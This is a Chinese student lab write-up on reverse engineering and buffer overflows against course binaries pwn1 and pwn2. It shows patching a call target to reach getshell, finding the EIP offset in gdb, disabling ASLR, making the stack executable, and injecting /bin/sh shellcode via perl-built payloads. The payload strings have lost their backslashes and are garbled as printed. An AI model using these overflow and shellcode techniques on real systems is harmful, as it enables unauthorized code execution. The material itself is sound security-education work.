实验一 逆向与Bof基础
一、直接修改程序机器指令,改变程序执行流程
使用 objdump -d pwn1 对pwn1文件进行反汇编。
可知main函数跳转至foo函数,先要使main函数跳转至getshell函数,即修改返回地址。
首先使用vi查看器查看pwn1文件,并使用 %!xxd 转换为十六进制查看:
利用 “:e8 d7”查找到需要修改的目标;
将“e8 d7”改为“e8 c3”。
使用 %!xxd -r将文件转换回原文件,保存退出后,再次反汇编进行查看。
此时,main函数返回地址被修改至getshell函数。
二、通过构造输入参数,造成BOF攻击,改变程序执行流
先使用gdb对pwn2文件进行调试:
接下来对函数进行输入数据的测试,意图找到eip中存在4位数。
输入测试数据“1111111122222222333333334444444455555555”,并使用 info r 查看堆栈指令:
此时,eip中存放的是35353535,35是5的ascii码值。
再次输入测试数据“1111111122222222333333334444444412345678”,并使用 info r 查看:
此时eip中存放34333231,即4321。
使用 perl -e 'print "11111111222222223333333344444444x7dx84x04x08x0a"' > input 进行输入,再使用 xxd input 查看文件的十六进制:
三、注入Shellcode并执行
首先先做实验准备,先利用 apt-get install execstack 下载··execstack··。
输入命令:
execstack -s pwn1 //设置堆栈可执行
execstack -q pwn1 //查询文件的堆栈是否可执行
more /proc/sys/kernel/randomize_va_space
echo "0" > /proc/sys/kernel/randomize_va_space //关闭地址随机化
more /proc/sys/kernel/randomize_va_space
构造输入: perl -e 'print "x90x90x90x90x90x90x31xc0x50x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x50x53x89xe1x31xd2xb0x0bxcdx80x90x4x3x2x1x00"' > input_shellcode
其中,x4x3x2x1为溢出到eip的部分,也就是要修改为shellcode的首地址。
输入 (cat input_shellcode;cat) | ./pwn2 ,运行pwn2,然后打开顶一个终端,输入 ps -ef | grep pwn2 找到pwn2的进程号
利用进程号进入gdb调试:
输入 disassemble foo 查看foo的栈地址:
输入 break *0x080484a5 设置断点,并continue。
然后输入info r,查看栈的地址;
然后输入x/32x 0xffffd35c,并不断修改范围,寻找01020304;
之后在01020304的地址上加4,即d3 5c加4,使其覆盖之后的返回地址。
即填充 perl -e 'print "A" x 32;print "x60xd3xffxffx90x90x90x90x90x90x31xc0x50x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x50x53x89xe1x31xd2xb0x0bxcdx80x90x00xd3xffxffx00"' > input_shellcode 指令。
至此,覆盖成功。
实验成功。